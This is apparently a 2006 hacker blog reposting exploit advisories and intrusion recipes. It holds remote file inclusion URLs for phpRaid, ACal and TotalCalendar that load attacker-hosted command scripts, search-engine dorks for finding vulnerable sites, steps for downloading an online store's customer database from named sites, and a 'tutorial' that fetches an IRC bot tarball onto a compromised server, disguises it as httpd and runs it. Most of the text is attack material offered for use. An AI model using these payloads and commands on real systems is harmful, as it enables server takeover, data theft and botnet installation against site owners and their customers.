|
| Tuesday, May 09, 2006 |
| Bug PHP RAID |
# Kurdish Security Advisory
# phpRaid Remote File Include [PHPBB/SMF] :}
# "Sosyalizim'de .srar insan olmakta .srard.r" Abdullah Ocalan
# Contact : irc.gigachat.net #kurdhack & www.PatrioticHackers.com & botan@linuxmail.org
# Script : phpRaid
# Script Website : http://www.spiffyjr.com/
# Version : phpRaid v2.9.5
" v3.0.b1
# w0rkz : "phpRaid" "inurl:"phpRaid" etc. :)
http://www.site.com/[phpraidpath]/auth/auth.php?phpbb_root_path=http://files.fazar.net/cmd?&=
http://www.site.com/[phpraidpath]/auth/auth_phpbb/phpbb_root_path=
http://www.site.com/[phpraidpath]/auth/auth.php?smf_root_path=http://files.fazar.net/cmd?&=
http://www.site.com/[phpraidpath]/auth/auth_SMF/smf_root_path=
# milw0rm.com [2006-05-09] |
posted by banjar-hack @ 9:31 PM   |
|
|
|
|
| COmersus BUg |
1. search in search engine like "comersus"
2. Found a site like "http://automemories.net/store/comersus_dynamicIndex.asp"
3. insert into that site "/database/comersus.mdb"
4. Get like this http://automemories.net/database/comersus.mdb
5. Good Luck !!!
http://wholesale-pocket-bike.biz/comersus/backofficeLite/
comersus_backoffice_install10.asp |
| posted by banjar-hack @ 11:23 AM |
|
|
|
| Sunday, May 07, 2006 |
| ACal 2.2.6 = Remote File Inclusion |
$*******************************************$
$ Title: ACal 2.2.6 = Remote File Inclusion $
$*******************************************$
$ URL: http://acalproj.sourceforge.net/ $
$***************************************$
$ Dork: intitle:"Login to Calendar" $
$***********************************$
$ Credits: PiNGuX $
$*****************$
$ Greetz : [0o] $
$***************$
Exploit:
http://[url]/[calendar_path]/embed/day.php?path=http://yourhost/cmd.gif?cmd=ls
# milw0rm.com [2006-05-07] |
| posted by banjar-hack @ 6:58 PM |
|
|
|
| Saturday, May 06, 2006 |
| Making Bot For IRC |
Tutorial for making bot
1. find the directory with "find / -type d -perm -2 -ls"
2. wget http://oerwal.freecoolsite.com/robot.tar.gz
lwp-download http://oerwal.freecoolsite.com/robot.tar.gz
curl -O http://oerwal.freecoolsite.com/robot.tar.gz
3. "tar -zxvf robot.tar.gz"
4. Go to "nenen" directory
5. Type "./evie"
6. Type "./evie a.txt Nick_Bot ident_bot IP_Host Chanel Owner"
7. find PID "ps -aux"
8. ./crotz "/usr/local/apache/bin/httpd -DSSL" ./eggdrop -m a.txt
9. The NickBot Will Join To chanel
10. Pv The Nick Bot
11 Type "pass password"
12. login dengan mengetikkan "login password"
13."rehash" to restart bot
14. Upload tcl bot to nenen/scripts
15. Back to "nenen"
16. Type "./tcl -t a.txt load.tcl"
17. good Luck!
cat /etc/hosts ----> gasan melihat ip hosts |
| posted by banjar-hack @ 4:44 PM |
|
|
|
|
| TotalCalendar v2.30 Bug |
Vendor: SweetPHP
URL: http://sweetphp.com
-----------------------------------------------------------------
Credits:
Discovered by: 'Aesthetico'
http://www.majorsecurity.de
-----------------------------------------------------------------
Search for: "Powered by TotalCalendar"
-----------------------------------------------------------------
Exploitation:
/index.php?inc_dir=http://www.yourspace.com/yourscript.php?
/index.php?inc_dir=http://www.yourspace.com/yourscript.txt?&ls%20-laF
# milw0rm.com [2006-05-05] |
| posted by banjar-hack @ 1:59 PM |
|
|
|
|
| |
| The Time |
|
|
| Previous Post |
|
| Archives |
|
|
| it's You? |
|
| Links |
| SecurityDownload |
| Powered by |
 |
|
